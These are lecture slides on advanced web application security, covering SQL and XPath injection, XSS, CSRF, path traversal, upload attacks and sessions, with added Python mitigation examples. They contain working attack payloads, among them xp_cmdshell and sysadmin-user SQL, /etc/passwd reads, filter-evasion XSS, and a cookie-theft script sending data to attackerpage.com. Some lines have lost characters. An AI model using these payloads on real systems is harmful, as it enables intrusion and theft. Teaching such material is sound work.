Advanced Security for Systems Engineering VO 01: Web Application Security
Slide 1: Advanced Security for Systems Engineering VO 01: Web Application Security
Stefan Taber, Christian Schanes
INSO Industrial Software, Institute of Computer Aided Automation, Faculty of Informatics, TU Wien

Slide 2: Agenda
- OWASP Top 10
- SQL Injection
- XPath Injection
- Cross Site Scripting
- Cross Site Request Forgery
- Path Traversal Attack
- File Upload Attack
- Session Management

Slide 3: Introduction
- The lecture Security for Systems Engineering covers the basics of SQL Injection, XSS and CSRF
- In this lecture we show examples of several advanced attacks on web applications, including the consequences of the attacks
- We show how different attacks can work together to break applications

Slide 4: Web Applications (figure)
- World wide in use: browser apps, applications, presentations

Slide 5: OWASP Top 10
1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery (CSRF)
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects and Forwards
Slide 6: SQL Injection
- SQL Injection: insert SQL query data via the input data to the application and let the DBMS interpret the malicious input
- Blind SQL Injection: the attacker has no direct feedback about the data, only information about whether the data is processed or not (side channel). Therefore, SQL Injection is possible but more effort is required to extract data from the target

Slide 7: SQL Injection: Identify Vulnerable Parameters (i)
- There are 3 main data types: number, string and date
- Identify vulnerable parameters of the type number
  Request: /myecommercesite/proddetails.asp?prodid=4
  Testing:
  (1) SELECT * FROM Products WHERE ProdID = 4 //ERROR
  (2) SELECT * FROM Products WHERE ProdID = //OK
  The parameter is vulnerable because of (2)!

Slide 8: SQL Injection: Identify Vulnerable Parameters (ii)
- Identify vulnerable strings
  Request: /myecommercesite/proddetails.asp?prodname=book
  Testing:
  (1) SELECT * FROM Products WHERE ProdName='Book' //ERROR
  (2) SELECT * FROM Products WHERE ProdName='B'+'ook' //OK
  If (2) works, the parameter is vulnerable!

Slide 9: Differences in Databases
- Database identification by database behavior
- Attacks depend on specific functions

                | MS SQL      | MySQL            | Access        | Oracle   | DB2           | Postgres
Concat strings  | +           | concat(" ", " ") | " "&" "       | " "+" "  |               |
Null            | Isnull()    | Ifnull()         | Iff(Isnull()) | Ifnull() | Ifnull()      | COALESCE()
Position        | CHARINDEX   | LOCATE()         | InStr()       | InStr()  | InStr()       | TEXTPOS()
OS              | xp_cmdshell | select into      | #date#        | utf_file | import/export | Call
Cast            | Yes         | No               | No            | No       | Yes           | Yes

Slide 10: Databases and Operating Systems
- Interaction with the file system: write files, read files
- Execute commands with the permissions of the database user

Slide 11: Blind SQL Injection: Read Data
- The attacker has no feedback about the data, only information about whether data is selected or not. Therefore, SQL Injection is possible but more effort is required to extract data from the target
- One way to steal the data are brute force attacks; the output is only true or false
  1. Example: customer exists / does not exist
  2. admin and password like 'a%'  -> False
  3. admin and password like 'b%'  -> True
  4. admin and password like 'ba%' -> False
  5. admin and password like 'bk%' -> True
- Automated tools are available, e.g., SqlDumper

Slide 12: UNION SELECT Injection
- UNION SELECT statements are used to combine multiple SQL statements into one single query
- This allows an attacker to access all tables in a system
- All SELECT queries must have the same number of columns and the columns must have the same type

Slide 13: UNION SELECT Injection Example
  SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE AccNum= ORDER BY $order
- Inject the order parameter:
  SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE AccNum= ORDER BY 1 UNION SELECT CCNum,NULL,NULL,NULL FROM CreditCards

Slide 14: Extended Stored Procedures (MS-SQL)
- MS-SQL servers support a large number of extended stored procedures, implemented in DLLs
- Examples: ..., xp_cmdshell (execute commands on OS level), xp_servicecontrol (start/stop services)
- Example: stopping the schedule service
  EXEC master..xp_servicecontrol 'stop', 'schedule'
- Example: execute ping
  ; exec master..xp_cmdshell 'ping ip-address'

Slide 15: File Access (MySQL)
- Load local files into the database: LOAD_FILE()
  UNION SELECT '','',load_file('/etc/passwd');
- Write files with data from the database: SELECT INTO OUTFILE
- Attackers can write the files to folders where they have access
- Example: using the web server to fetch the written file
  SELECT * FROM user INTO OUTFILE '/webserver/database-dump'

Slide 16: SQL Injection: Add Database User
- MS-SQL:
  exec sp_addlogin 'evil', 'passwd'
  exec sp_addsrvrolemember 'evil', 'sysadmin'
- MySQL:
  INSERT INTO mysql.user (user, host, password) VALUES ('evil', 'localhost', PASSWORD('passwd'))
- Oracle:
  CREATE USER evil IDENTIFIED BY passwd TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
  GRANT CONNECT TO evil;
  GRANT RESOURCE TO evil;

Slide 17: SQL Injection: Avoiding Input Filters (i)
- Examples for tautologies:
  OR 1=1
  OR now()=now()
  OR 2 BETWEEN 1 AND 3
- Using functions and encodings:
  union select * from users where login = char(114,111,111,116);

Slide 18: SQL Injection: Avoiding Input Filters (ii)
- Using blanks, tabs and line breaks:
  UNION SELECT (written with tabs or line breaks instead of the blank)
- Using comments:
  /**/OR/**/'x'='x'
  select/**/*/**/from/**/users;
- It is difficult to create correct filters, especially self-written ones

Slide 19: SQL Injection: Prevention and Mitigation
- Input validation
- Stored procedures and prepared statements
- Principle of least privilege
- Random delays on successful and failing statement execution
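The concatenation flaw and the prepared-statement mitigation of slides 6 to 19, as an added example that is not part of the lecture; it uses Python's bundled SQLite with a constructed two-row users table and inputs modelled on the tautology and comment payloads of slides 17 and 18:

```python
import sqlite3

# Constructed sample schema and data for this demonstration (not from the lecture).
SCHEMA = """
CREATE TABLE users (login TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES ('root', 's3cret', 'admin');
INSERT INTO users VALUES ('alice', 'wonderland', 'user');
"""


def open_db():
    """In-memory SQLite database holding the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, login, password):
    """Builds the query by string concatenation: the input becomes part of the
    SQL grammar, so quotes, comments and OR clauses in it are interpreted."""
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_prepared(conn, login, password):
    """Prepared statement: the query text is fixed, the input is bound as data
    and can never change the statement structure (slide 19)."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (login, password))]


# Constructed inputs after slides 17 and 18: a plain tautology, the same
# tautology hidden in /**/ comments, and a char()-encoded 'root' (114,111,111,116).
PAYLOADS = {
    "tautology": "' OR 1=1 --",
    "comments": "'/**/OR/**/'x'='x",
    "char_encoded": "' OR login = char(114,111,111,116) --",
}


def run_demo():
    """Runs every payload through both login functions as the password of the
    non-existent user 'nobody'.
    Returns {payload_name: {"vulnerable": [logins], "prepared": [logins]}}."""
    conn = open_db()
    results = {}
    for name, payload in PAYLOADS.items():
        results[name] = {
            "vulnerable": login_vulnerable(conn, "nobody", payload),
            "prepared": login_prepared(conn, "nobody", payload),
        }
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(name, outcome)
```

The concatenated query returns rows for every payload (all users for the two tautologies, root for the char() form), while the bound parameters return nothing for any of them.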
Slide 20: XPath Injection
- Similar to SQL Injection; instead of SQL, XPath statements are used
- Often possible when XML is used as the database
  //user[name='admin' and pass='secure']
- Inject: ' or ''='
  //user[name='admin' and pass='unknown' or ''='']
Slide 21: Cross Site Scripting (XSS)
- Interpretation of maliciously injected code in the browser
- Basically the user is the target, not the application; the application is abused as the medium
- The malicious script code is loaded from a trusted site
- Starting point to execute arbitrary code controlled by the attacker on the client side

Slide 22: Cross Site Scripting: Identify Vulnerable Parameters
- Basic test for injectable fields of a web page: URL parameters, any field in the page, headers of an HTTP message
- Test vectors:
  Plain HTML: <h1>, <b>, <br/>, <img src=...>
  JavaScript: <script>...</script>, <img src="javascript:...">, <b onmouseover=...>

Slide 23: Cross Site Scripting Examples
- Redirects:
  <script>window.location.replace("http://stackoverflow.com");</script>
- Session hijacking:
  http://www.testdomain.com/default.aspx?username=<script>window.location.href="http://www.attackerpage.com/index.php?content="+document.cookie</script>

Slide 24: Cross Site Scripting: Avoiding Input Filters
  <IMG SRC="javascript:alert('XSS');">
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=JaVaScRiPt:alert('XSS')>
  <IMG SRC=javasc ript:ale rt('XSS')>
  ><STYLE>@import'javascript:alert("XSS")';</STYLE>
  >%22%27><img%20src%3d%22javascript:alert(%27%20xss%27)%22>
  %uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
  ;! <XSS>=&{()}

Slide 25: MySpace Worm (Samy Worm) as Example
- Adds the profile Samy to users
- Within one day more than contact requests
- JavaScript in CSS: <div style="background:url('javascript:alert(1)')">
- Avoid filtering of "javascript" via java\nscript
- Avoid filtering of " via String.fromCharCode(34)
- Avoid filtering of "innerHTML" via eval('document.body.inne' + 'rHTML')
- Using XML-HTTP (AJAX) for attacking the target

Slide 26: Cross Site Scripting Prevention
- Input validation
- Filter or disable JavaScript and Flash in the browser
- Content Security Policy
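An added example (not from the lecture) contrasting a signature blacklist, which the evasion vectors of slides 24 and 25 defeat, with output encoding, the form of input validation slide 26 calls for. The vectors are constructed after those slides, and ActiveContentDetector is a hypothetical checker that tokenizes the rendered HTML the way a browser does.

```python
import html
import re
from html.parser import HTMLParser

# Attack vectors modelled on slides 22, 24 and 25 (constructed for this example).
VECTORS = [
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",                        # mixed case
    "<IMG SRC=\"javasc\tript:alert('XSS')\">",                  # embedded tab
    "<div style=\"background:url('java\nscript:alert(1)')\">",  # Samy: java\nscript in CSS
    "<b onmouseover=alert(1)>hover</b>",
    "<script>window.location.replace('http://stackoverflow.com');</script>",
]

# Attributes whose value a browser interprets as a URL or as CSS.
URL_ATTRS = {"src", "href", "action", "formaction", "background", "style"}


class ActiveContentDetector(HTMLParser):
    """Records every place in rendered HTML where script could run: script
    tags, on* event handlers, and javascript: URLs (judged after removing
    the whitespace that browsers ignore inside the scheme)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append("event handler " + name)
            elif name in URL_ATTRS:
                normalised = re.sub(r"\s", "", value or "").lower()
                if "javascript:" in normalised:
                    self.findings.append("javascript: URL in " + name)


def find_active_content(rendered_html):
    """Returns the list of active-content findings for a rendered fragment."""
    detector = ActiveContentDetector()
    detector.feed(rendered_html)
    detector.close()
    return detector.findings


def blacklist_filter(value):
    """Naive signature blacklist of the kind slide 49 warns about: it strips
    the literal strings an author first thinks of, and nothing else."""
    for bad in ("<script", "javascript:", "onmouseover"):
        value = value.replace(bad, "")
    return value


def render_with_blacklist(user_value):
    return "<p>" + blacklist_filter(user_value) + "</p>"


def render_escaped(user_value):
    """Output encoding for the HTML text context: <, >, &, " and ' become
    entities, so the input is displayed as text and never parsed as markup."""
    return "<p>" + html.escape(user_value, quote=True) + "</p>"


def render_attribute_escaped(user_value):
    """Attribute context: the same encoding is sufficient only because the
    attribute value is quoted; an unquoted attribute would need a stricter rule."""
    return '<a title="' + html.escape(user_value, quote=True) + '">profile</a>'


def evaluate():
    """For each vector, reports whether the rendered output still carries
    active content under the blacklist and under output encoding."""
    return [
        {
            "vector": v,
            "blacklist_bypassed": bool(find_active_content(render_with_blacklist(v))),
            "escaped_bypassed": bool(find_active_content(render_escaped(v))),
            "attribute_escaped_bypassed": bool(find_active_content(render_attribute_escaped(v))),
        }
        for v in VECTORS
    ]
```

The blacklist stops only the three literal forms it names; the mixed-case, tab and newline variants pass straight through, whereas the encoded renderings carry no active content for any vector.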
Slide 27: Cross Site Request Forgery (CSRF)
- CSRF: abusing the trust of an application in the user
- The attacker sends a forged HTTP request to the victim (the application) via the user

Slide 28: CSRF: Identify Vulnerable Parameters (i)
- Identify unvalidated redirects and forwards
- Identify insecure direct object references
- Identify SQL Injection vulnerable parameters
- Identify XSS vulnerable parameters
- Img-tag injection

Slide 29: CSRF: Identify Vulnerable Parameters (ii)
1. Let u be the URL being tested.
2. Build an HTML page containing the HTTP request referencing URL u (specifying all relevant parameters; in the case of HTTP GET this is straightforward, while for a POST request you need to resort to some JavaScript).
3. Make sure that the valid user is logged on to the application.
4. Induce him into following the link pointing to the URL to be tested (social engineering involved if you cannot impersonate the user yourself).
5. Observe the result, i.e. check if the web server executed the request.
(See OWASP Testing Guide, OTG-SESS-005)

Slide 30: CSRF with Routers/Firewalls
1. Attacker creates a manipulated web page
2. User opens the manipulated web page
3. The response of the server is returned
4. Browser directly executes the commands in the response (without user interaction)
5. Attacker has access to the internal system and can modify the system, e.g., modify the firewall configuration

Slide 31: Examples of CSRF Attacks
- Multiple CSRF attacks in DD-WRT (remote root command execution)
- Cisco Router HTTP Administration CSRF remote command execution
- OpenCA Cross Site Request Forgery (CVE )

Slide 32: CSRF Prevention
- Input validation
- Secret information with every request (e.g., a token)
- Encrypted end-to-end connection
- Good random number generator
  <form>
    <input type="hidden" name="token" value="123">
    New password: <input type="password" name="new_pwd">
    <input type="submit" value="Submit">
    <a href="/users/userdetails?id=5&token=123">Cancel</a>
  </form>
Slide 33: Path Traversal Attack
- Web directories are virtual directories based on the operating system
- Specific failures (Perl scripts, Unicode, ...) allow breaking out of the directory structure provided by the web server
- Allows unauthorized access to files and programs on OS level
- Attackers use this to navigate through directories and to collect information

Slide 34: Path Traversal: Identify Vulnerable Parameters
- Basic test for fields of a web page: URL parameters, URL path, headers of an HTTP message
- Test vectors:
  ../../../../etc/passwd
  ../../boot.ini
  ..\..\boot.ini

Slide 35: Example of Path Traversal / Command Injection
- Path traversal using Unicode: system32/cmd.exe?/c+dir
- Decoding the Unicode characters results in: system32/cmd.exe?/c+dir

Slide 36: Path Traversal Prevention
- Configuration hardening
- Input validation
- Principle of least privilege
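Added example, not part of the lecture: a resolver that applies the input validation of slide 36 to the test vectors of slides 34 and 35 by decoding, normalising and only then checking that the result stays under the document root; the root /var/www/html and the sample requests are constructed.

```python
import posixpath
import urllib.parse

# Assumed document root of the web server (constructed for this example).
WEB_ROOT = "/var/www/html"


def resolve_web_path(requested, web_root=WEB_ROOT):
    """Maps a request path onto a file below web_root.

    Returns the canonical absolute path, or None when the request would leave
    the document root. The order matters: decode first, then normalise, then
    compare, so encoded or backslash-separated ".." sequences (slides 34 and
    35) are judged in their decoded form. On a real file system the returned
    path should additionally be passed through os.path.realpath to catch
    symbolic links, which a lexical check cannot see.
    """
    decoded = requested
    # Decode twice so that double-encoded sequences such as %252e%252e are
    # seen as "..". An overlong or otherwise invalid UTF-8 sequence (the
    # Unicode trick of slide 35) decodes to U+FFFD; treat that as hostile.
    for _ in range(2):
        decoded = urllib.parse.unquote(decoded)
    if "\x00" in decoded or "\ufffd" in decoded:
        return None
    # Windows-style separators count as separators too (..\..\boot.ini).
    decoded = decoded.replace("\\", "/")
    # Resolve "." and ".." lexically, relative to the root.
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate


# Requests modelled on the test vectors of slide 34 (constructed inputs).
SAMPLE_REQUESTS = [
    "images/logo.png",
    "../../../../etc/passwd",
    "..\\..\\boot.ini",
    "%2e%2e/%2e%2e/etc/passwd",
    "%252e%252e%252fetc/passwd",
    "..%c0%af..%c0%afetc/passwd",
    "index.html%00.jpg",
]


def classify(requests=SAMPLE_REQUESTS):
    """Returns {request: resolved_path_or_None} for a list of request paths."""
    return {r: resolve_web_path(r) for r in requests}


if __name__ == "__main__":
    for request, resolved in classify().items():
        print(repr(request), "->", resolved)
```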
Slide 37: File Upload Attack
- Using file upload fields to upload malicious files
- Possible attacks: DoS, command injection

Slide 38: File Upload Attack: Identify Vulnerable Parameters
- Null-byte file
- Large files
- Wrong file type
- XSS by file name

Slide 39: File Upload Attack: XML Bomb
- Creates a high processing load with minimal data; allows Denial of Service attacks
  <?xml version="1.0"?>
  <!DOCTYPE foobar [
    <!ENTITY x0 "ESSE">
    <!ENTITY x1 "&x0;&x0;">
    <!ENTITY x2 "&x1;&x1;">
    ...
    <!ENTITY x98 "&x97;&x97;">
    <!ENTITY x99 "&x98;&x98;">
  ]>
  <foobar>&x99;</foobar>

Slide 40: File Upload Attack Prevention
- Limit for file size; break the upload when the file size is over the limit
- Input validation
- Principle of least privilege
- Configuration hardening
- Validate the file type by magic number (like the UNIX command file)
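Added example (not from the lecture) implementing the prevention list of slide 40 against the probes of slide 38 and the XML bomb of slide 39: a size limit, a file-name whitelist, a magic-number check, and a DTD ban for XML uploads. The accepted types, the size limit and the sample files are constructed.

```python
import re
import xml.etree.ElementTree as ET

MAX_UPLOAD_BYTES = 2 * 1024 * 1024          # constructed size limit

# File signatures ("magic numbers") of the types this constructed service
# accepts: the check slide 40 describes via the UNIX command file.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "application/pdf": b"%PDF-",
}
ALLOWED_EXT = {
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg",
    "pdf": "application/pdf", "xml": "application/xml",
}
# Whitelist for file names: no path separators, no HTML, no leading dot.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")
DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def xml_is_safe(data):
    """The XML bomb of slide 39 needs ENTITY declarations inside a DTD.
    Refusing any document that carries a DTD removes the expansion problem
    before the parser runs; the document must then still be well-formed."""
    if DTD_MARKER.search(data):
        return False
    try:
        ET.fromstring(data)
    except ET.ParseError:
        return False
    return True


def check_upload(filename, data):
    """Validates an upload. Returns (True, media_type) or (False, reason)."""
    if len(data) > MAX_UPLOAD_BYTES:                 # large files (DoS)
        return False, "too large"
    if "\x00" in filename:                           # null-byte file name
        return False, "null byte in file name"
    if not SAFE_NAME.match(filename):                # XSS by file name, traversal
        return False, "unsafe file name"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    media_type = ALLOWED_EXT.get(ext)
    if media_type is None:                           # wrong file type by name
        return False, "extension not allowed"
    if media_type == "application/xml":
        return (True, media_type) if xml_is_safe(data) else (False, "xml rejected")
    if not data.startswith(MAGIC[media_type]):       # wrong file type by content
        return False, "content does not match extension"
    return True, media_type


# Constructed sample uploads.
PNG_OK = MAGIC["image/png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 16
BENIGN_XML = b'<?xml version="1.0"?><foobar>hello</foobar>'
# A shortened version of the entity-expansion document shown on slide 39.
XML_BOMB = (b'<?xml version="1.0"?>\n<!DOCTYPE foobar [\n'
            b'<!ENTITY x0 "ESSE">\n<!ENTITY x1 "&x0;&x0;">\n'
            b'<!ENTITY x2 "&x1;&x1;">\n<!ENTITY x3 "&x2;&x2;">\n]>\n'
            b'<foobar>&x3;</foobar>')

if __name__ == "__main__":
    for name, blob in (("logo.png", PNG_OK), ("bomb.xml", XML_BOMB),
                       ("avatar.png", b"GIF89a" + b"\x00" * 16)):
        print(name, check_upload(name, blob))
```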
Slide 41: HTTP Session Management
- HTTP is stateless; session management is required, using cookies, hidden form fields or URL parameters
- Client-side sessions vs. server-side sessions
- Cookies: session data is part of the HTTP header (e.g., non-persistent cookies)
- URL parameters: pass session data via the URL (e.g., "parameter=value", multiple values separated by &)
- Hidden form fields: hidden HTML code, detectable by source code analysis (e.g., <input type="hidden" name="name" value="value">)

Slide 42: Session ID
- Sessions store information about the current state: user login, user remains logged in
- Sessions are implemented by session IDs
- Takeover of existing sessions is possible with session IDs of bad quality
- Random session IDs vs. built session IDs (username, date, ...)
- Cookies vs. encoded into the URL as a parameter: session IDs in the referrer are available to other pages

Slide 43: Identify Vulnerable Session IDs
- Entropy of session IDs
- Does a user get a new session ID after a successful login?
- Is the session destroyed after logout?

Slide 44: Session Fixation Attack (i)

Slide 45: Session Fixation Attack (ii)
1. Attacker sends a request to the web server
2. Web server generates a new session and transfers the session ID
3. Attacker sends a link with the session ID to the victim
4. Victim opens the link
5. Victim logs into the web service using the supplied session ID
The attacker now has a valid session with the identity of the victim

Slide 46: Pseudo Random Number Generator (PRNG)
- Many security methods depend on the unpredictability of random numbers: cryptographic keys, session IDs, authentication protocols / handshakes
- Security of a PRNG depends on: confidentiality and randomness of the seed, quality of the algorithm

Slide 47: Session IDs: Protection Techniques
- Secure random number generator
- Existing libraries for session management
- New session ID after login
- Time limit for sessions
- Use security flags in session ID cookies: HttpOnly (the cookie cannot be accessed through client-side script), Secure (send only over HTTPS), Expire (expiry date)
- Encrypted connection (HTTPS)
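Added example, not from the lecture: a minimal server-side session store that applies the slide 47 rules (CSPRNG IDs, new ID after login, time limit, HttpOnly/Secure/Expires flags) and replays the slide 45 fixation sequence with and without ID rotation. SESSION_TTL, the cookie name and the user names are assumptions.

```python
import secrets
import time
from email.utils import formatdate

SESSION_TTL = 15 * 60          # constructed time limit, in seconds


class SessionStore:
    """Server-side sessions keyed by an unguessable ID; the client only ever
    holds the ID (slides 41 and 47)."""

    def __init__(self):
        self._sessions = {}    # sid -> {"user": str | None, "created": float}

    def create(self, now=None):
        sid = secrets.token_urlsafe(32)     # CSPRNG, 256 bits of entropy
        created = now if now is not None else time.time()
        self._sessions[sid] = {"user": None, "created": created}
        return sid

    def get(self, sid, now=None):
        """Returns the session for a client-supplied ID, or None if the ID is
        unknown (the server never adopts IDs it did not issue) or expired."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = now if now is not None else time.time()
        if now - session["created"] > SESSION_TTL:
            self.destroy(sid)
            return None
        return session

    def destroy(self, sid):
        self._sessions.pop(sid, None)

    def login(self, presented_sid, user, now=None, rotate=True):
        """Authenticates the user. With rotate=True (slide 47: new session ID
        after login) the pre-login ID is destroyed and a fresh one issued;
        rotate=False keeps whatever ID the client presented, which is exactly
        the behaviour session fixation relies on."""
        if rotate:
            self.destroy(presented_sid)
            sid = self.create(now)
        else:
            sid = presented_sid if presented_sid in self._sessions else self.create(now)
        self._sessions[sid]["user"] = user
        return sid


def set_cookie_header(sid, now=None):
    """Set-Cookie line with the flags of slide 47: HttpOnly keeps the ID out
    of document.cookie (the hijack of slide 23), Secure restricts it to HTTPS,
    Expires bounds its lifetime on the client."""
    now = now if now is not None else time.time()
    expires = formatdate(now + SESSION_TTL, usegmt=True)
    return "Set-Cookie: SESSIONID=%s; Path=/; HttpOnly; Secure; Expires=%s" % (sid, expires)


def fixation_scenario(rotate):
    """Replays slide 45: the attacker obtains a session ID from the server and
    the victim logs in while presenting that ID. Returns what each party holds."""
    store = SessionStore()
    planted = store.create()                                      # steps 1-2
    victim_sid = store.login(planted, "victim", rotate=rotate)    # steps 4-5
    attacker_view = store.get(planted)
    return {
        "attacker_gets_victim_session": attacker_view is not None and attacker_view["user"] == "victim",
        "victim_logged_in": store.get(victim_sid)["user"] == "victim",
        "id_changed_at_login": planted != victim_sid,
    }


if __name__ == "__main__":
    print("without rotation:", fixation_scenario(rotate=False))
    print("with rotation:   ", fixation_scenario(rotate=True))
```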
Slide 48: Combinations of Attacks
- Download source code using path traversal
- Source analysis finds a weak PRNG
- Predictable CSRF tokens
- Launch CSRF attacks
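Added example, not from the lecture, for slides 32 and 48: a CSRF token tied to the session and checked in constant time, the slide 32 form rendered with it, and a predictability check showing why a token drawn from a seeded general-purpose PRNG fails where a CSPRNG token does not. The session identifiers, the form action and the seed range are constructed.

```python
import hmac
import html
import random
import secrets


def weak_token(seed):
    """Token from a general-purpose PRNG (Mersenne Twister) seeded with a
    low-entropy value such as the login time in seconds. Whoever can guess the
    seed can regenerate the token: the weak PRNG of slide 48."""
    return "%032x" % random.Random(seed).getrandbits(128)


def strong_token():
    """128 bits from the operating system CSPRNG (slide 47: secure RNG)."""
    return secrets.token_hex(16)


def reproducible_from_seeds(token, seed_candidates):
    """Predictability check for a token: True if some candidate seed
    regenerates it. Used here to show why the weak scheme fails review."""
    return any(weak_token(seed) == token for seed in seed_candidates)


class CsrfGuard:
    """Per-session secret that every state-changing request must carry
    (slide 32). The attacker's page cannot read it, so it cannot forge it."""

    def __init__(self):
        self._tokens = {}    # session id -> token

    def issue(self, session_id):
        token = strong_token()
        self._tokens[session_id] = token
        return token

    def validate(self, session_id, submitted):
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        return hmac.compare_digest(expected, submitted)   # constant-time compare


def render_password_form(token):
    """The form of slide 32 with the token in the hidden field and in the
    Cancel link; html.escape keeps the value from breaking the attribute."""
    t = html.escape(token, quote=True)
    return (
        '<form method="post" action="/users/changepassword">\n'
        '  <input type="hidden" name="token" value="%s">\n'
        '  New password: <input type="password" name="new_pwd">\n'
        '  <input type="submit" value="Submit">\n'
        '  <a href="/users/userdetails?id=5&amp;token=%s">Cancel</a>\n'
        '</form>' % (t, t)
    )


def handle_change_password(guard, session_id, form_fields):
    """Server side of the request: rejected unless the token matches the session."""
    if not guard.validate(session_id, form_fields.get("token")):
        return 403, "missing or invalid CSRF token"
    return 200, "password changed"


def csrf_demo():
    """A legitimate submission versus the forged request of slide 27, which the
    attacker's page sends from the user's browser without knowing the token."""
    guard = CsrfGuard()
    token = guard.issue("session-A")
    genuine = handle_change_password(guard, "session-A", {"token": token, "new_pwd": "x"})
    forged = handle_change_password(guard, "session-A", {"new_pwd": "y"})
    other = handle_change_password(guard, "session-B", {"token": token, "new_pwd": "x"})
    return {"genuine": genuine[0], "forged": forged[0], "other_session": other[0]}


if __name__ == "__main__":
    print(csrf_demo())
    seeds = range(1600000000, 1600000060)      # constructed one-minute window
    print("weak token reproducible:", reproducible_from_seeds(weak_token(1600000042), seeds))
    print("strong token reproducible:", reproducible_from_seeds(strong_token(), seeds))
```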
Slide 49: Input Filter
- Input validation: blacklist filter, whitelist filter, sanitization
- Blacklist filters based on signatures are complex, because there are so many ways to express the same thing

Slide 50: Summary
- Web application security is required
- OWASP Top 10 vulnerabilities
- Advanced attack techniques to break web applications (SQL Injection, XSS, CSRF, XML attacks)
- Prevention and mitigation of such attacks

Slide 51: Literature/Links
- Michal Zalewski. The Tangled Web: A Guide to Securing Modern Web Applications. No Starch Press, San Francisco, CA, USA, 1st edition.
- Open Web Application Security Project (OWASP)
- OWASP Top 10 Project
- OWASP Testing Guide
- Web Application Security Consortium
- RFC 2616 (HTTP 1.1)

Slide 52: Thank you!
INSO Industrial Software, Institute of Computer Aided Automation, Faculty of Informatics, TU Wien
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
More informationSQL Injection. Sajjad Pourali sajjad@securation.com CERT of Ferdowsi University of Mashhad
SQL Injection Sajjad Pourali sajjad@securation.com CERT of Ferdowsi University of Mashhad SQL Injection Ability to inject SQL commands into the database engine Flaw in web application, not the DB or web
More informationWeb Application Firewall on SonicWALL SSL VPN
Web Application Firewall on SonicWALL SSL VPN Document Scope This document describes how to configure and use the Web Application Firewall feature in SonicWALL SSL VPN 5.0. This document contains the following
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationHow To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
More informationAttack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability
More informationWeb Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas Andreas.Karakanas@os3.nl George Thessalonikefs George.Thessalonikefs@os3.nl University of Amsterdam System & Network Engineering MSc
More informationSoftware Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0
Special Publication 500-269 Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0 Paul E. Black Elizabeth Fong Vadim Okun Romain Gaucher Software Diagnostics and
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationSecure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationNNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a: WIN- 2LR8M18J6A1 On WIN-2LR8M18J6A1 - By admin for time period 6/10/2014 8:59:44 AM to 6/10/2014 8:59:44 AM NNT CIS Microsoft
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
